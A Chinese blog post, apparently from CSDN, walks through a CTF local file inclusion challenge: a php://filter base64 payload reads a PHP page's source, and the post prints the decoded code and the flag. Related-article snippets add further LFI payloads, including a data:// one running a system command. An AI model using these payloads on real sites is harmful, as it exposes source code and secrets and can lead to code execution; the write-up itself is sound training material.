php filter 文件包含,文件包含lfi

最新推荐文章于 2023-07-05 15:53:40 发布

Reset12138

最新推荐文章于 2023-07-05 15:53:40 发布

阅读量329

点赞数

php filter 文件包含

CG-CTF web(文件包含漏洞)

php://filter 的使用：

php://filter 的应用：

1、利用base64获得源码

2、通过读写编码实行绕过操作

打开链接为下

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php

搜索以后发现：

“简单的文件包含，当发现url中有?file=字样时可以修改后面为?file=php://filter/convert.base64-encode/resource=xxx.php来查看对应文件源码”

这句话的意思是我们用base64编码的方式来读文件index.php；这时页面会显示出源文件index.php经过base64编码后的内容，然后经过base64解码就可以看到flag；

所以构造：

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到：

PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmK

CEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC

9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0

cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7C

gkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0

KCj8+CjwvaHRtbD4=

经在线网站base64解码后得：

asdf

error_reporting(0);

if(!$_GET[file]){echo ‘click me? no‘;}

$file=$_GET[‘file‘];

if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

echo "Oh no!";

exit();

}

include($file);

//flag:nctf{edulcni_elif_lacol_si_siht}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Reset12138

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ctf中怎样获取php文件源码,CTF中文件包含的一些技巧

weixin_39580682的博客

03-09

3758

前言文件包含在 CTF 比赛也是常考的一个点，这里对一些包含点的原理、特征进行一些总结，并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议是文件包含的基础，理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据，简单来说POST请求的情况下，php://input可以获取到post的数据。使用条件：include()、includ...

文件包含中过滤了php,文件包含漏洞---php协议

weixin_32480335的博客

03-21

725

一、原理1、概念：在php代码中，总会有一些代码我们会经常用到，这时引入了文件包含函数，可以通过文件包含函数把这些代码文件包含进来，直接使用文件中的代码，这样提高了我们的工作效率。2、文件包含函数：include()：如果发生错误，会产生一个警告然后继续执行脚本include_once()：与include()相同，如果文件之前被包含过则不再包含require()：会停止执行代码require_o...

参与评论您还未登录，请先登录后发表或查看评论

php filter 文件包含,php://filter(文件包含漏洞利用)及php://input

weixin_39990401的博客

03-10

344

1. php://filter文件包含漏洞：https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用：1、字符串过滤器：string.rot13 对字符串执行ROT13转换string.toupper转换为大写string.tolower 转换为小写string.strip_tags去除html和php标记2、转换过...

PHP文件包含fillter,2. 文件包含(150)

weixin_39934085的博客

03-11

174

文件包含 (150)-------南京邮电大学ctf : http://4.chinalover.sinaapp.com/web7/index.php从这道ctf的网址：http://4.chinalover.sinaapp.com/web7/index.php?file=show.php我们明显感受到了文件包含的信息文件包含漏洞，先了解一下php://filterphp://filter 是一...

文件包含 [ACTF2020 新生赛]Include1（php://filter协议）

一醉一休的博客

02-23

573

前言服务器解析执行php文件时能够通过包含函数加载另外一个文件中的php代码，当被包含的文件中存在木马时，也就意味着木马程序会在服务器上加载执行一、[ACTF2020 新生赛]Include1（php://filter协议） 1）一点开题目，没看到什么，点这个提示 2）只有这一句话 3）可以看到网址后面多了一个文件，也没有发现其他东西，可能是文件包含 4）文件包含直接读取的是文件，而不是文件源码，所以要想办法读取源码 php://filter/read=convert....

php文件包含漏洞（input与filter）

a173262565的博客

03-06

1249

php://input php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言，它给内存带来的压力较小，并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。 php://filter协议协议语法： php://filter:/<action>=...

LFI 临时文件RCE总结

qq_43576303的博客

07-26

1038

LFI 临时文件RCE总结 PHP LFI即本地文件包含漏洞，通过包含本地服务器上存储的一些文件，例如session文件、日志文件、临时文件等达到拿服务器权限的目的。比较常用的方法有：PHPINFO()和 PHP7 Segment Fault。他们的基本原理都是向服务器上传生成恶意的临时文件，再对恶意文件进行包含即可RCE。临时文件文件名由于临时文件名是由随机函数生成的，我们需要获取正确的文件名，也就是$_FILES['userfile']['name']。存储目录及命名规律文件被上传后

ctf本地包括_新手入门之本地文件包含(附靶机文件)

weixin_39769984的博客

12-29

744

概述通过加强对本地文件包含(LFI)渗透测试技术的研究，可以帮助渗透测试人员和学生在未来的渗透测试过程中，识别和测试LFI漏洞。在Web程序渗透测试中，利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外，在本文中提到有一些技术，在CTF大赛中也经常被利用。什么是本地文件包含(LFI)漏洞?LFI允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有正确过滤输入数据的情况下...

DVWA之PHP文件包含漏洞（File Inclusion）

最新发布

fzy2003的博客

07-05

604

掌握data协议和filter协议的用法。

ctf本地包括_文件包含CTF题目

weixin_39667041的博客

12-19

877

文件包含 1502、解题方法：使用php://filter协议读取index文件。3、源码分析asdferror_reporting(0);if(!$_GET[file]){echo 'click me? no';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||st...

文件下载，包含

qq_41672971的博客

12-12

156

11111111111

buuctf-web-[极客大挑战 2019]Secret File1

mlws1900的博客

08-05

531

get传参，可以利用文件包含，对tp，input进行了过滤，可以用filter对文件进行读取，而且已经告知我们flag在flag.php里面，写出如下payload。刚开始看到这个界面还以为是目录扫描，结果把网页扫死了。发现一个 secr3t.php，打开获得了代码。对以上编码进行base64解码获得flag。点击secret，看来要利用bp抓包。...

[极客大挑战 2019]Secret File

rang的博客

10-18

143

根据提示，猜测这个页面可能隐藏了信息查看源代码：发现了/Archive_room.php 点一下密码啥都没有用burp抓包抓到action.php 得到secr3t.php if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } 过滤了 ../ input .

CTFshow刷题日记-WEB-文件包含

Love&Share

09-04

4253

文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");

探索php://filter在实战当中的奇技淫巧

qq_45521281的博客

05-30

2012

前言在渗透测试或漏洞挖掘的过程中，我们经常会遇到php://filter结合其它漏洞比如文件包含、文件读取、反序列化、XXE等进行组合利用，以达到一定的攻击效果，拿到相应的服务器权限。最近看到php://filter在ThinkPHP反序列化中频繁出现利用其相应构造可以RCE，那么下面就来探索一下关于php://filter在漏洞挖掘中的一些奇技淫巧。 php://filter 在探索php://filter在实战当中的奇技淫巧时，一定要先了解关于php://filter的原理和利用。 php://fi

提升渗透测试技能：揭秘本地文件包含(LFI)漏洞检测与利用

本地文件包含（Local File Inclusion, LFI）是渗透测试领域中的一个重要知识点，特别是在Web应用程序的安全评估中。这种漏洞发生在Web应用未对用户输入进行有效过滤，使得攻击者能够通过恶意URL或脚本参数，使服务器...